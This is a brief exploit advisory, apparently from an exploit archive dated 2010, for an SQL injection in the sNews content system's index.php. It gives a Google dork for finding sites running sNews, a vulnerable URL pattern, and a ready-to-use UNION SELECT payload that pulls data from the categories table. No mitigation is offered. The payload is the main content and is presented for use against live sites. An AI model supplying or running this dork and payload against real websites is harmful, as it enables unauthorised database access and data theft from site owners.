# Exploit Title:sNews (index.php) SQL Injection Vulnerability
# Date: 2010-07-24
# Author: MajoR
# Software Link: http://snews.awddesign.co.uk
# Version: N/A
# Tested on: Wnidows xp SP2
# CVE : N/A
====================================================sNews (index.php) SQL Injection Vulnerability
===================================================
Author : MajoR
Email : Ma-j-oR@hotmail.fr
DORK : "Powered by sNews " inurl:index.php?id=
===================================================
[+] Vulnerable File :
http://www.Victime.com/sNews/index.php?id=
[+] ExploiT :
-82/**/union/**/select/**/1,concat%28published,0x3a,name%29,3,4,5,6,7,8,9,10,11+from+categories--
====================================================
Greetingz To SlaSSi & Xella